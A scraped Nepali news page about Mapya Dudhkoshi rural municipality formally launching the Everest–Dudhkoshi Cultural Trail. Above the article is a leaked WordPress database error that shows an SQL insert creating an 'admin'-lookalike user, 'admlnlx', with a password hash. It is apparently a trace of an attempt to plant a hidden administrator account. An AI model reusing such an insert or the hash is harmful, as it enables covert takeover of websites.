WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BLBaxVOEF1kKW7CVbnzbrcv.hXWC8E1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-24 19:09:10', '', 'admlnlx', 'admlnlx')

माप्यदुधकोशीमा नयाँ पर्यटकिय पदमार्गको औचारिक शुरुवात हुने – Gaule Khabar

माप्यदुधकोशीमा नयाँ पर्यटकिय पदमार्गको औचारिक शुरुवात हुने

माप्यदुधकोशीमा नयाँ पर्यटकिय पदमार्गको औचारिक शुरुवात हुने

काठमाण्डौ । माप्यदुधकोशी गाउँपालिका सोलुखुम्बुले नयाँ पर्यटकिय पदमार्गको औचारिक शुरुवात गर्ने भएको छ । बिगत लामो समयदेखि पर्यटन क्षेत्रको बिकास केन्द्रित खोज अनुसन्धान गर्दै आएको माप्यदुधकोशीले अन्ततः एभरेष्ट–दुधकोशी कल्चरल ट्रेलको औपचारिक शुरुवात गर्न लागेको हो ।
नेपाल पर्यटन बोर्ड तथा ट्रेकिङ एजेन्सिज एशोसियसन अफ नेपाल (टान) को सहकार्यमा संचालित जीविकोपार्जन पुर्नउत्थानका लागि दिगो पर्यटन (STLRP) को आर्थिक सहयोगमा पालिकाले ५ देखि ९ दिनसम्मको अवधिमा पुरा गर्न सकिने सो पर्यटकिय पदमार्गको शुरुवात गर्न लागेको माप्यदुधकोशी गाउँपालिका अध्यक्ष बुद्धिकिरण राईले जानकारी दिए ।
अध्यक्ष राईका अनुुसार भाद्र १६ गते सोमबार काठमाण्डौ भृकुटीमण्डपस्थित नेपाल पर्यटन बोर्डमा आयोजित कार्यक्रम मार्फत अन्ततः एभरेष्ट–दुधकोशी कल्चरल ट्रेलको औचारिक शुरुवात हुनेछ । उनका अनुसार यस पदमार्गबाट विश्वको सर्वोच्च शिखर सगरमाथा सहित अन्य अग्ला हिमश्रृखंला, प्राकृतिक तथा साँस्कृति सम्पदा, पहाडी तथा हिमाली गाउँघर, त्यहाँको रहनसहन, गुराँसको मनमोहक दृश्य सहित पैदल मार्गको आनन्द लिन सकिने छ ।
रक क्लाईम्बिङका लागि प्रचुर सम्भावना रहेको सो पालिकाले बिगतमा पनि यसै पदमार्गलाई प्रबद्र्धन गर्ने उद्धेश्यले म्याराथन, प्रबद्र्धनात्मक तथा प्रचारात्मक कार्यक्रम, रक क्लाईम्बिङको सम्भावना अध्ययन सहित क्लाईम्बिङ अभ्यास लगायतका कार्य गर्दै आएको पालिका अध्यक्ष राईले बताए ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका